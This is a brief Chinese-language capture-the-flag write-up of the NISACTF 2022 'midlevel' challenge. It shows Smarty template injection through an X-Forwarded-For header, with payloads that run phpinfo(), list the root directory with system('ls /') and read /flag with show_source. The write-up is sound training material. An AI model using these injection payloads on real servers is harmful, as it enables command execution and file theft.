[NISACTF 2022]midlevel

[NISACTF 2022]midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :
[NISACTF 2022]midlevel_第1张图片

最下面提示:Build With Smarty ! :

[NISACTF 2022]midlevel_第2张图片

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

[NISACTF 2022]midlevel_第3张图片

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

{if phpinfo()}{/if}

返回结果:

[NISACTF 2022]midlevel_第4张图片

查看根目录下所有文件:

if system('ls /')}{/if}

返回结果:

[NISACTF 2022]midlevel_第5张图片

发现 flag 。

读取 flag 文件:

{if show_source('/flag')}{/if}

返回结果:

[NISACTF 2022]midlevel_第6张图片

拿到 flag 。

你可能感兴趣的:(ctf,web安全,网络安全)